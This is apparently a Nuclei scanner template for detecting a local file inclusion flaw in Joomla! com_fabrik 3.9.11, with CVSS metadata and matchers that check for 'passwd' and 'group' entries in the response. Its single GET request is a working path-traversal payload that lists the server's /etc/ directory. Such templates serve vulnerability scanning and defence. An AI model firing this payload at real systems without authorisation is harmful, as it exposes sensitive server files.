id: joomla-com-fabrik-lfi

info:
  name: Joomla! com_fabrik 3.9.11 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: Joomla! com_fabrik 3.9.11 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/48263
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: joomla,lfi,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"value":"passwd"'
          - '"value":"group"'
          - '"disable":false'
        condition: and

      - type: status
        status:
          - 200

# digest: 490a0046304402207bf93a21737a1c8794427a3d605bc6946b21eee534399a98f1c5860f29a303c702205a3411577044a0c42714898dbfea07627994017f1ff56cf88e0a50a02fc64dfb:922c64590222798bb761d5b6d8e72950
